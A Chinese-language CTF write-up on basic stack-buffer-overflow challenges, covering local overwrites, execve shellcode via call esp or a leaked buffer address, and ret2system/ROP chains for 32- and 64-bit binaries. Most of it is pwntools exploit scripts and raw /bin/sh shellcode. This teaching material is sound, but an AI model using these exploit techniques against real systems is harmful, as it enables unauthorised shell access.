CTF中的PWN—(栈溢出)
本文主要讲的是利用栈溢出的基础PWN,分别有使用shellcode类型、满足函数条件类型及使用软件自带system函数类型,其中自带system函数的类型软件因为传参方式不同进而分为32bit与64bit的软件。
满足函数条件类型
很low的命名~///这种类型就是通过栈溢出使函数栈内满足某种条件则执行自带的system函数的类型,下面是此类型题目的例子:
题目:bof
放入IDA中查看:
可以看到存在get()危险函数,可接收任意长度的输入并存到变量s的地址&s中。当变量a1等于 0xcafebabe即可,可以看到字符s距离ebp为0x2c,则距离形参a1为0x2c+0x8=52u。则payload如下:
from pwn import *
p = process('./bof')
payload = 52 * 'A' + p32(0xcafebabe)
p.recvuntil('overflow me :')
p.sendline(payload)
p.interactive()
运行结果如下:
使用shellcode类型
32bit程序传参方式是将参数从右到左依次入栈,同时构造call指令时需要伪造PUSH EIP指令。
题目一:stack2
首先用file命令看一下文件为32位的elf文件:
其次使用checksec查看软件的防护措施:
没有防护,拖入IDA分析,可以看到危险函数strcpy():
&dest的EIP偏移量为0x14 + 0x4 = 24u,使用gdb打开程序,查找函数栈中call esp或jmp esp的地址以便call esp到我们的shellcode起始地址上:
选择call esp地址为0x08048577,payload如下:
from pwn import *
p = process('./stack2')
shellcode = (
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
"\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
)
callesp = 0x08048577
payload = 24 * 'A' + p32(callesp) + shellcode
p.recvuntil('please input password:')
p.sendline(payload)
p.interactive()
脚本运行如下:
题目二:stack2
注意:使用shellcode类型的有两种溢出方式,第一种是将shellcode溢出到溢出点函数栈外面,第二种是溢出在溢出点函数栈内部,但是由于每次加载地址都会变,所以可能十次溢出只能成功两次。
将程序拖入IDA中查看,存在危险函数,但是首先程序中无system函数及/bin/sh或cat flag等敏感参数,其次在gdb中使用ropsearch "call esp"不管用,,,同时每次程序的溢出点地址都暴露出来了:
通过程序泄露出的溢出点的地址,可以保证每次都能将shellcode的起始地址溢出到返回地址以执行,payload如下:
from pwn import *
p = process('./level1')
shellcode = (
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
"\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
)
recv = p.recv(23)
buf_addr = recv[14:-1]
payload = shellcode + 'A' * (140 - len(shellcode)) + p32(int(buf_addr,16))
p.sendline(payload)
p.interactive()
脚本运行结果如下:
自带system函数类型
64bit:
题目一:bugku_pwn2
首先查看文件类型为64bit且无防护措施:
拖入IDA64中发现了read()危险函数,可以通过此函数进行栈溢出操作:
同时发现有getshell函数:
思路一:思路为溢出函数地址到EIP即可 ,而溢出点到EIP返回地址的偏移量为0x30 + 0x8 = 56u此处可以写getshell的地址,也可以写system的地址,不过首地址要写压入参数的指令的地址。下图分别为getshell函数地址与system('cat flag')的地址:
注意:如果使用call system(‘cat flag’)执行的话,必须要在0x400769 将cat flag压入rdi中的edi中进行传参,如果直接40076E是无参数的。同时指令是按顺序执行的,也就是执行完mov edi, 'cat flag'后会继续执行 call _system。
下面的payload中以getshell函数的地址为例:
from pwn import *
p = process('./pwn2')
system_addr = 0x400751
payload = 'A' * 56 + p64(system_addr)
p.recvuntil('say something?')
p.sendline(payload)
p.interactive()
运行后执行了cat flag:
思路二:另一种做法是自己给system函数添加参数,由于64位程序前七个参数从左到右一次使用寄存器传参,首先需要找到指令pop rdi指令进行参数的调整:
需要将pop rdi + p64(& cat flag) + system()溢出到返回地址上,则payload如下:
from pwn import *
p = process('./pwn2')
system_addr = 0x40076E
arg_addr = 0x400857
pop_rdi = 0x4007e3
payload = 'A' * 56 + p64(pop_rdi) + p64(arg_addr) + p64(system_addr)
p.recvuntil('say something?')
p.sendline(payload)
p.interactive()
运行如下:
题目二:bugku_pwn4
放入IDA64中查看,发现read()危险函数:
查看函数发现system()函数,其他函数没啥意义,查一下字符串:
发现”$0“,注意,$0相当于bin/sh。也就是system('$0') == system('bin/sh') 。那么做题思路就是给system函数中传入$0参数即可。使用ROPgadget --binary "pwn4" --string ’\$0‘来查看字符串$0的地址:
查找pop rdi的地址位0x4007d3。溢出点距返回地址位0x10 + 0x8 = 24u
payload如下:
from pwn import *
p = process('./pwn4')
pop_rdi = 0x4007d3
arg_addr = 0x60111f
system_addr = 0x40075A
payload = 'A' * 24 + p64(pop_rdi) + p64(arg_addr) + p64(system_addr)
p.recvuntil('Come on,try to pwn me')
p.sendline(payload)
p.interactive()
运行如下:
题目三:Jarvis OJ_tell me something
拖入IDA64中查看发现有危险函数get()与函数goodgame(),只需要将goodgame函数地址溢出到返回地址执行即可,写payload后怎么都无法执行,后来看了一下汇编,发现有一个坑,正常call 函数都是push rbp mov rbp,rsp sub rsp xxx。
但是这个程序没有进行push rbp:(注:此处直接rsp减 88h,距离rip直接为88h。反汇编使用rbp - 88h表示,尽管没有push rbp!!!)
所以溢出点距离返回值的偏移不用再加0x8即可,payload如下:
from pwn import *
p = remote('pwn.jarvisoj.com',9876)
system = 0x400620
payload = 'A' * 136 + p64(system)
p.recvuntil('Input your message:')
p.sendline(payload)
p.interactive()
运行如下:
32bit:
题目一:Jarvis OJ_level2
拖入IDA查看发现危险函数read(),查找字符串/bin/sh的地址及system函数的地址。由于程序时32bit的,所以传参的时候需要伪造EIP返回地址才能执行system函数,payload构造姿势是:溢出到返回地址 + call system + 伪造EIP(‘aaaa’) + arg。
payload构造如下:
from pwn import *
p = process('./level2')
sys_addr = 0x8048320
arg_addr = 0x804A024
payload = 'A' * 140 + p32(sys_addr) + 'nEIP' + p32(arg_addr)
p.recvuntil('Input:')
p.sendline(payload)
p.interactive()
脚本执行如下:
